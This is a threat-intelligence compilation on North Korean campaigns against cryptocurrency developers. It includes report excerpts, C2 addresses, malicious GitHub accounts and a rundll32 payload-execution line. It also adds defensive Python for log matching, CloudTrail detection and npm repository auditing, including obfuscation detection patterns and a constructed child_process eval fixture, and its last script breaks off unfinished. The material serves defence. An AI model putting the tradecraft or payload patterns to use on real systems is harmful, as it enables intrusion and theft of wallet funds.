New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
When we decoded the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine. The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host’s platform name, the username and a random, 6-character-long string.
C2:: 45.61.139[.]219
C2:: ethertestnet[.]pro
C2:: deliworkshopexpress[.]xyz
FBI Identifies Cryptocurrency Funds Stolen by DPRK
Active North Korean campaign targeting security researchers
Date:: 2023-09-07
In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0-day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample is named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:
Lazarus Group’s Undercover Operations 2022–2023 - L. Taewoo, S. Lee & D. Kim
Since early October 2023, Microsoft has observed two North Korean nation-state threat actors – Diamond Sleet and Onyx Sleet – exploiting CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server. TeamCity is a continuous integration/continuous deployment (CI/CD) application used by organizations for DevOps and other software development activities.
Lazarus’ New Campaign Exploiting Legitimate Software
This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.
FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application
Date:: 2023-10-30
Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them.
Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.
Operation Dream Magic, MagicLine4NX - Hackers use zero-day in supply-chain attack
North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.
Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:
Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.
In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.
SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.
A number of RustBucket variants have since been sighted. Additionally, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.
There are extension IDs hardcoded in there that are related to crypto wallets, and the JavaScript attempts to decrypt/collect that data and send it off to the server at IP 147.124.212[.]89:1244 using different endpoints.
Blockchain dev's wallet emptied in "job interview" using npm package
The Upwork job posting asks the applicant to "fix bugs and resopnsiveness [sic] on website" and claims to pay between $15 and $20 hourly for a task expected to take under a month.
CVE-2024-21338 - North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw
Date:: 2024-02-24
The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions.
JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI.
This type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in an attack reported by Google [1] in January 2021. The following sections describe the details of test.py.
In addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is a command starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and encode functions. This characteristic is also found in other types of malware used by Lazarus, including malware BLINDINGCAN.
After test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file: $ rundll32 output.py,CalculateSum
pycryptoenv
pycryptoconf
quasarlib
swapmempool
blockchain-newtech[.]com/download/download.asp
fasttet[.]com/user/agency.asp
chaingrown[.]com/manage/manage.asp
91.206.178[.]125/upload/upload.asp
SquidSquad | Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.
Contagious Interview | SlowMist: Lazarus group appears to be currently reaching out to targets via LinkedIn and stealing employee privileges or assets through malware
Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing.
Github:: plannet-plannet
Github:: bmstoreJ
Github:: CodePapaya
Github:: Allgoritex
Github:: bohinskamariia
Github:: danil33110
Github:: aluxiontemp
Github:: komeq1120
Github:: aufeine - Account active since 2024-04-15
Github:: dhayaprabhu - Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
Github:: MatheeshaMe - Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
Github:: Satyam-G5 - Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
Github:: emadmohd211 - Account active since 2021
Github:: alifarabi - Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
Bitbucket:: juandsuareza
Bitbucket:: freebling
C2:: 172.86.97[.]80:1224
C2:: 172.86.123[.]35:1244
C2:: 147.124.212[.]89:1244
C2:: 147.124.212[.]146:1244
C2:: 147.124.213[.]11:1244
C2:: 147.124.213[.]29:1244
C2:: 147.124.214[.]129:1244
C2:: 147.124.214[.]131:1244
C2:: 147.124.214[.]237:1244
C2:: 67.203.7[.]171:1244
C2:: 67.203.7[.]245:1244
C2:: 91.92.120[.]135:3000
C2:: 45.61.131[.]218:1245
C2:: 173.211.106[.]101:1245
Python Trojan, with C2 at 45.61.131[.]218:1245
Download a Python script for deploying AnyDesk from the URL "/adc/" of the first-stage C2 server (147.124.214[.]237:1244)
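The C2 entries above are published defanged (`[.]`), which is how they should be stored but not how they appear in telemetry. The following is an added example, not code from any of the cited reports, that refangs a subset of that list, matches it against connection records, and adds a lower-confidence check for the 1224/1244/1245 listener ports the BeaverTail C2s share. The log records are constructed and follow Zeek conn.log column order (ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto), which is an assumption to adjust for your own sensor.

```python
"""Refang the page's C2 list and match it against connection logs (added example)."""
import ipaddress
from typing import Iterable, List, Set, Tuple

# Subset of the C2 entries listed above, kept defanged exactly as on the page.
DEFANGED_C2 = [
    "172.86.97[.]80:1224",
    "172.86.123[.]35:1244",
    "147.124.212[.]89:1244",
    "45.61.131[.]218:1245",
    "91.92.120[.]135:3000",
]
# Ports recurring across the BeaverTail/InvisibleFerret infrastructure listed above.
C2_PORTS = {1224, 1244, 1245}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def refang(ioc: str) -> str:
    """Undo common defanging so the value can be compared with raw telemetry."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def load_c2(entries: Iterable[str]) -> Set[Tuple[ipaddress.IPv4Address, int]]:
    """Parse 'ip:port' entries into a set of (address, port) keys."""
    out = set()
    for entry in entries:
        host, port = refang(entry).rsplit(":", 1)
        out.add((ipaddress.ip_address(host), int(port)))
    return out


def is_internal(addr: ipaddress.IPv4Address) -> bool:
    return any(addr in net for net in RFC1918)


# Constructed conn.log-style records: ts, uid, orig_h, orig_p, resp_h, resp_p, proto.
SAMPLE_CONN = [
    ("1717232000.1", "CAbc1", "10.0.0.5", "51000", "147.124.212.89", "1244", "tcp"),  # listed C2
    ("1717232001.2", "CAbc2", "10.0.0.5", "51001", "8.8.8.8", "53", "udp"),           # benign DNS
    ("1717232002.3", "CAbc3", "10.0.0.7", "51002", "203.0.113.50", "1244", "tcp"),    # unknown host, C2 port
    ("1717232003.4", "CAbc4", "10.0.0.7", "51003", "10.0.0.20", "1245", "tcp"),       # internal, ignored
]
SAMPLE_CONN_LINES = ["\t".join(rec) for rec in SAMPLE_CONN]


def match_conn_log(lines: Iterable[str], c2: Set[Tuple[ipaddress.IPv4Address, int]]) -> List[tuple]:
    """Return (uid, source, destination, reason) for each record worth triaging."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        _ts, uid, orig_h, _orig_p, resp_h, resp_p, proto = line.split("\t")[:7]
        resp = ipaddress.ip_address(resp_h)
        dest = f"{resp_h}:{resp_p}"
        if (resp, int(resp_p)) in c2:
            hits.append((uid, orig_h, dest, "known C2"))
        elif proto == "tcp" and int(resp_p) in C2_PORTS and not is_internal(resp):
            hits.append((uid, orig_h, dest, "C2 port pattern"))
    return hits


if __name__ == "__main__":
    for hit in match_conn_log(SAMPLE_CONN_LINES, load_c2(DEFANGED_C2)):
        print(*hit)
```

The port heuristic is deliberately separate from the exact match: an exact hit on a listed C2 is actionable on its own, while a connection to an unlisted host on one of these ports is only a pivot for further review.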
US court orders forfeiture of 279 crypto accounts tied to North Korea laundering
Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware.
While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.
Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.
Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.
In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022
Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.
Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:
Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.
From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.
bestonlinefilmstudio[.]org
blockchain-newtech[.]com
ccwaterfall[.]com
chaingrown[.]com
defitankzone[.]com
detankwar[.]com
freenet-zhilly[.]org
matrixane[.]com
pointdnt[.]com
starglowventures[.]com
mingeloem[.]com
From Opportunity to Threat: My Encounter with a Blockchain Job Scam
North Korean Government-Backed Groups Targeting Brazil
Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.
"Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry..."
Hacking Group Known as “Andariel” Used Ransom Proceeds to Fund Theft of Sensitive Information from Defense and Technology Organizations Worldwide, Including U.S. Government Agencies
The FBI has observed the following list of potential indicators of North Korean social engineering activity:
Requests to execute code or download applications on company-owned devices or other devices with access to a company’s internal network.
Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
Offers of employment from prominent cryptocurrency or technology firms that are unexpected or involve unrealistically high compensation without negotiation.
Offers of investment from prominent companies or individuals that are unsolicited or have not been proposed or discussed previously.
Insistence on using non-standard or custom software to complete simple tasks easily achievable through the use of common applications (i.e. video conferencing or connecting to a server).
Requests to run a script to enable call or video teleconference functionalities supposedly blocked due to a victim's location.
Requests to move professional conversations to other messaging platforms or applications.
Unsolicited contacts that contain unexpected links or attachments.
Crypto exchange heists typically involve a series of events that map to the Targeted Attack Lifecycle. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.
Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for “VP of Finance and Operations” at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as RUSTBUCKET which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as “Safari Update” with a command-and-control (C2 or C&C) domain autoserverupdate[.]line[.]pm.
The following snippet shows example decrypted AWS EC2 SSM Parameters identified in AWS CloudTrail logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million.
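Because the wallet material was recovered from decrypted SSM Parameter Store values, the detection that would have fired an hour before the drain is a check on decrypting parameter reads in CloudTrail. The following is an added example, not Mandiant's code, that flags `ssm:GetParameter*` calls made with `withDecryption=true`, raises an alert when a principal reads sensitively named parameters and another when one principal bursts through many decrypted reads in a short window. The events are constructed; the `requestParameters` field names follow CloudTrail's rendering of the SSM API and should be confirmed against your own logs.

```python
"""Flag decrypting SSM Parameter Store reads in CloudTrail (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

SSM_READS = {"GetParameter", "GetParameters", "GetParametersByPath"}
# Substrings that mark a parameter as wallet or key material; tune per environment.
SENSITIVE_HINTS = ("wallet", "private", "key", "secret", "mnemonic", "seed")

# Hypothetical principals for the constructed events below.
DEPLOY_ROLE = "arn:aws:sts::111122223333:assumed-role/ci-deploy/build-42"
DEV_USER = "arn:aws:iam::111122223333:user/dev-alice"


def _ev(time, arn, ip, name, event="GetParameter", decrypt=True):
    """Build a minimal CloudTrail-shaped record (constructed test data)."""
    params = {"withDecryption": decrypt}
    params.update({"names": name} if isinstance(name, list) else {"name": name})
    return {"eventTime": time, "eventSource": "ssm.amazonaws.com", "eventName": event,
            "userIdentity": {"arn": arn}, "sourceIPAddress": ip, "requestParameters": params}


SAMPLE_EVENTS = [
    _ev("2024-06-01T09:00:00Z", DEPLOY_ROLE, "10.0.1.5", "/prod/app/signing_key"),
    _ev("2024-06-01T09:31:00Z", DEV_USER, "203.0.113.7", "/prod/wallet/hot/private_key"),
    _ev("2024-06-01T09:31:20Z", DEV_USER, "203.0.113.7", "/prod/wallet/hot/address"),
    _ev("2024-06-01T09:31:45Z", DEV_USER, "203.0.113.7", "/prod/wallet/cold/mnemonic"),
    _ev("2024-06-01T09:32:10Z", DEV_USER, "203.0.113.7",
        ["/prod/exchange/api_secret", "/prod/exchange/api_key"], event="GetParameters"),
    _ev("2024-06-01T09:32:30Z", DEV_USER, "203.0.113.7", "/prod/wallet/hot/username"),
    _ev("2024-06-01T09:33:05Z", DEV_USER, "203.0.113.7", "/prod/wallet/hot/password"),
    _ev("2024-06-01T09:34:00Z", DEV_USER, "203.0.113.7", "/prod/app/feature_flag", decrypt=False),
    {"eventTime": "2024-06-01T09:35:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "userIdentity": {"arn": DEV_USER}},
]


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def decrypted_reads(events):
    """Yield (time, principal, source ip, parameter names) for reads that asked for plaintext."""
    for e in events:
        if e.get("eventSource") != "ssm.amazonaws.com" or e.get("eventName") not in SSM_READS:
            continue
        params = e.get("requestParameters") or {}
        if not params.get("withDecryption"):
            continue
        names = params.get("names") or [params.get("name") or params.get("path") or "?"]
        yield (parse_time(e["eventTime"]), e.get("userIdentity", {}).get("arn", "?"),
               e.get("sourceIPAddress", "?"), names)


def detect(events, allowlist=frozenset(), window=timedelta(minutes=10), burst=5):
    """Return alerts: sensitive decrypts by non-allowlisted principals, and read bursts."""
    alerts, times_by_principal = [], defaultdict(list)
    for t, who, ip, names in sorted(decrypted_reads(events), key=lambda r: r[0]):
        times_by_principal[who].append(t)
        hits = [n for n in names if any(h in n.lower() for h in SENSITIVE_HINTS)]
        if hits and who not in allowlist:
            alerts.append({"type": "sensitive_decrypt", "principal": who, "ip": ip,
                           "names": hits, "time": t.isoformat()})
    for who, times in times_by_principal.items():
        for i, start in enumerate(times):          # sliding window over sorted times
            j = i
            while j < len(times) and times[j] - start <= window:
                j += 1
            if j - i >= burst:
                alerts.append({"type": "burst_decrypt", "principal": who,
                               "count": j - i, "from": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, allowlist=frozenset({DEPLOY_ROLE})):
        print(alert)
```

The allowlist exists because deployment roles legitimately decrypt parameters; the burst check does not honour it, so a compromised deploy role that suddenly walks the whole wallet namespace still alerts.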
APT Lazarus: Eager Crypto Beavers, Video calls and Games
Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
The campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as JavaScript malware in November 2023, and a native macOS version of BeaverTail was discovered in July 2024.
Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others
freeconference[.]io
mirotalk[.]net
The malicious JavaScript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the "scripts" property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js.
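The pattern above (an entry script declared in package.json that requires a helper buried elsewhere in the tree) can be checked before anyone runs `npm install` or `npm start` on a repository received during an interview. The following is an added example, not code from the report or from any npm tooling: it reads the scripts block, reports lifecycle hooks that run automatically on install, follows `node <file>` entry points through relative `require()` calls, and flags files with obfuscation markers. The sample repository it audits is constructed here and its file contents are hypothetical.

```python
"""Audit an untrusted Node.js repository's package.json entry points (added example)."""
import json
import re
import shutil
import tempfile
from pathlib import Path
from typing import Optional

# Scripts npm runs without being asked to, at install time.
LIFECYCLE_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
NODE_ENTRY = re.compile(r"\bnode\s+(\S+\.[cm]?js)\b")
REL_REQUIRE = re.compile(r"""require\(\s*['"](\.\.?/[^'"]+)['"]\s*\)""")
MARKERS = {
    "eval()": re.compile(r"\beval\s*\("),
    "new Function()": re.compile(r"\bnew\s+Function\s*\("),
    "child_process": re.compile(r"child_process"),
    "hex-escaped string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "large base64 literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}
MAX_LINE = 2000  # minified or packed payloads tend to live on one very long line


def resolve_require(from_dir: Path, spec: str) -> Optional[Path]:
    """Mimic Node's relative resolution: exact file, then '.js', then a directory index."""
    base = from_dir / spec
    for cand in (base, base.with_name(base.name + ".js"), base / "index.js"):
        if cand.is_file():
            return cand.resolve()
    return None


def scan_js(path: Path, repo: Path, seen: set, out: list) -> None:
    """Flag obfuscation markers in a file, then follow its relative requires."""
    if path in seen or len(seen) > 200:
        return
    seen.add(path)
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = [label for label, rx in MARKERS.items() if rx.search(text)]
    longest = max((len(line) for line in text.splitlines()), default=0)
    if longest > MAX_LINE:
        hits.append(f"{longest}-char line")
    if hits:
        out.append(f"{path.relative_to(repo).as_posix()}: {', '.join(hits)}")
    for spec in REL_REQUIRE.findall(text):
        target = resolve_require(path.parent, spec)
        if target is not None:
            scan_js(target, repo, seen, out)


def audit_repo(repo_dir) -> dict:
    """Report lifecycle hooks, node entry points and suspicious files reachable from them."""
    repo = Path(repo_dir).resolve()
    pkg = json.loads((repo / "package.json").read_text(encoding="utf-8"))
    report = {"lifecycle_hooks": [], "entry_points": [], "suspicious_files": []}
    seen = set()
    for name, cmd in (pkg.get("scripts") or {}).items():
        if name in LIFECYCLE_SCRIPTS:
            report["lifecycle_hooks"].append(f"{name}: {cmd}")
        for m in NODE_ENTRY.finditer(cmd):
            entry = repo / m.group(1)
            if entry.is_file():
                report["entry_points"].append(f"{name} -> {m.group(1)}")
                scan_js(entry.resolve(), repo, seen, report["suspicious_files"])
    return report


# Constructed repository mirroring the layout described above; contents are hypothetical.
SAMPLE_FILES = {
    "package.json": json.dumps({"name": "demo-app", "scripts": {
        "start": "node server/server.js",
        "postinstall": "node scripts/setup.js",
        "test": "jest"}}, indent=2),
    "server/server.js": "const errors = require('../middlewares/helpers/error');\n"
                        "const express = require('express');\nerrors.install();\n",
    "middlewares/helpers/error.js": 'exports.install = function () {\n'
        '  var m = "\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73";\n'
        '  eval(require(m).execSync);\n};\n',
}


def demo() -> dict:
    """Materialise the constructed repository in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp())
    try:
        for rel, content in SAMPLE_FILES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content, encoding="utf-8")
        return audit_repo(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against the extracted archive before touching npm; a `start` script pointing at a server file is normal, so the signal is in what that file pulls in, not in the script itself.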
Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army.
Over the years, the RGB has revealed at least six threat groups
New malicious software packages believed to be linked to a campaign, VMConnect, first identified in August 2023
New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the `__init__.py` file and its corresponding compiled Python file (PYC) inside the `__pycache__` directory of the respective modules.
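Shipping a `.pyc` alongside the module matters because the interpreter loads the cached bytecode instead of recompiling when its header claims to match the source, so the bytecode is what actually runs. The following is an added example, not ReversingLabs' or the actor's code, that checks a module's cached bytecode against the source beside it: it decodes the PEP 552 header (magic, flags, then mtime and size or a source hash), compares it with the `.py`, and lists names that occur in the cached bytecode but not in a fresh compile of the source. The fixture is constructed in a temp directory: a clean module, then a poisoned `.pyc` compiled from injected source with a clean-looking `.py` put back beside it.

```python
"""Check that a module's __pycache__ bytecode corresponds to its source (added example)."""
import importlib.util
import marshal
import py_compile
import shutil
import struct
import tempfile
import types
from pathlib import Path


def parse_pyc_header(data: bytes) -> dict:
    """Decode the 16-byte PEP 552 header: magic, flags, then mtime+size or a source hash."""
    if len(data) < 16:
        raise ValueError("truncated pyc header")
    flags = struct.unpack("<I", data[4:8])[0]
    hdr = {"magic_ok": data[:4] == importlib.util.MAGIC_NUMBER,
           "hash_based": bool(flags & 1), "check_source": bool(flags & 2)}
    if hdr["hash_based"]:
        hdr["source_hash"] = data[8:16]
    else:
        hdr["mtime"], hdr["size"] = struct.unpack("<II", data[8:16])
    return hdr


def all_names(code) -> set:
    """Every global and attribute name referenced by a code object and its nested functions."""
    names, stack = set(), [code]
    while stack:
        c = stack.pop()
        names.update(c.co_names)
        stack.extend(k for k in c.co_consts if isinstance(k, types.CodeType))
    return names


def check_pyc(src_path) -> dict:
    """Compare the cached bytecode the interpreter would load with the source file."""
    src = Path(src_path)
    pyc = Path(importlib.util.cache_from_source(str(src)))
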